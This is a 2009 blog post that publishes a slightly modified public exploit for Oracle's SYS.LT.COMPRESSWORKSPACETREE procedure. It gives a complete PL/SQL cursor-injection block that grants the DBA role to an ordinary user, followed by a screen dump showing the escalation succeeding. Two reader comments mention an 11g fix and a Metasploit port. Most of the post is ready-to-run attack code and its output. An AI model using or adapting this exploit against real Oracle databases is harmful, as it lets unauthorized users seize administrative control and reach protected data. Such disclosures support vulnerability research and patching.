Oracle SYS.LT.COMPRESSWORKSPACETREE Exploit

July 2, 2009

This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and here you do not need create function privileges:

text file

——

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
SYS.LT.CREATEWORKSPACE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
SYS.LT.COMPRESSWORKSPACETREE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
end;

#———–screen dump—————————————————#
SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
6 SYS.LT.CREATEWORKSPACE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
7 SYS.LT.COMPRESSWORKSPACETREE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at “SYS.LT”, line 6118
ORA-06512: at “SYS.LT”, line 6087
ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
—

Comments

2 Comments

Slavik Markovich says:

July 3, 2009 at 11:13 pm

Nice one. Of course, it does not work with 11g because dbms_sql now checks before executing that the privileges did not change from the parse stage.

Slavik

Reply
CG says:

July 18, 2009 at 1:31 pm

ported to MSF for the defcon release!

is the regular create procedure version of this working on 11 for you?

Reply

Oracle SYS.LT.COMPRESSWORKSPACETREE Exploit

Comments

2 Comments

Leave a Reply Cancel reply

Trackback